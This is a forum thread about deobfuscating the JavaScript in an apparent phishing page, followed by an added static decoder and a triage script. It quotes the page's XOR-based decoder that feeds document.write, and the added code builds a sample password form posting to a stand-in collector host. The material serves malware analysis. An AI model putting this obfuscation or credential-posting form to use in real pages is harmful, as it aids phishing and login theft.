Tuts 4 You

Deobfuscating JavaScript shellcode


justcrypto


Hello Folks,

I don't do reversing for a living so the questions may be noobish.

Trying to convert the shellcode in the attached HTML file to an executable. It's Unicode, so I converted it to hex and then used the shellcode2exe.py tool to convert it to an executable. When I run the shellcode in a debugger it terminates, although strings shows it has LoadLibrary(). I see that there are two eval functions calling two different shellcodes. Are these two shellcodes interconnected? Do I need to combine them to analyze them? Any other pointers to run it successfully in a debugger?

Any help would be great!!

Sign-in.zip

Extreme Coders

This isn't shellcode. This is URL-encoded JavaScript. You can analyze this in jsunpack to get to the actual payload.

function g32c00168(s) {
    var r = "";
    var tmp = s.split("8164911");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "598995");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-7);
    }
    return r;
}

document.write(g32c00168(........))

From appearance, this looks like a phishing page.

Edited by Extreme Coders
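
Added example (not part of either post, and not taken from the attachment): the decoder quoted above can be re-implemented so that the hidden layer is returned as a string for inspection instead of being passed to document.write or eval. The names decodeLayer, encodeLayer and triage, the key prefix "4251", and the sample form with its collector.example URL are assumptions constructed for illustration; only the two constants and the XOR/offset arithmetic come from the posted function.

```javascript
// Added example: static re-implementation of the decoder quoted in the thread.
// The decoded layer is returned as a string; it is never eval'd or written to a DOM.
const DELIM = "8164911";      // separator constant from the posted decoder
const KEY_SUFFIX = "598995";  // suffix the posted decoder appends to the key

function decodeLayer(blob) {
  const parts = blob.split(DELIM);
  if (parts.length < 2) throw new Error("delimiter not found: not this encoder");
  const s = unescape(parts[0]);               // same legacy call as the original
  const k = unescape(parts[1] + KEY_SUFFIX);  // key is a string of decimal digits
  let out = "";
  for (let i = 0; i < s.length; i++) {
    const digit = parseInt(k.charAt(i % k.length), 10);
    out += String.fromCharCode((digit ^ s.charCodeAt(i)) - 7);
  }
  return out;
}

// Inverse of decodeLayer, used only to build a constructed test blob.
function encodeLayer(plain, keyPrefix) {
  const k = keyPrefix + KEY_SUFFIX;
  let data = "";
  for (let i = 0; i < plain.length; i++) {
    const digit = parseInt(k.charAt(i % k.length), 10);
    const c = (plain.charCodeAt(i) + 7) ^ digit;
    data += "%" + c.toString(16).padStart(2, "0");
  }
  return data + DELIM + keyPrefix;
}

// Quick triage of a decoded layer: where would a form send its data?
function triage(html) {
  const re = /<form[^>]*\baction\s*=\s*["']([^"']*)["']/gi;
  return {
    formActions: [...html.matchAll(re)].map((m) => m[1]),
    hasPasswordField: /type\s*=\s*["']?password/i.test(html),
    hasNestedEval: /\beval\s*\(|document\.write\s*\(/.test(html),
  };
}

// Constructed sample (not taken from Sign-in.zip); key prefix "4251" is made up.
const SAMPLE_PLAIN =
  '<form action="https://collector.example/post.php" method="post">' +
  '<input type="password" name="p"></form>';
const SAMPLE_BLOB = encodeLayer(SAMPLE_PLAIN, "4251");

const decoded = decodeLayer(SAMPLE_BLOB);
console.log(decoded);
console.log(triage(decoded));
```

Run it under Node.js on the string argument copied out of the page's document.write call; if hasNestedEval comes back true, the output contains another layer to decode the same way.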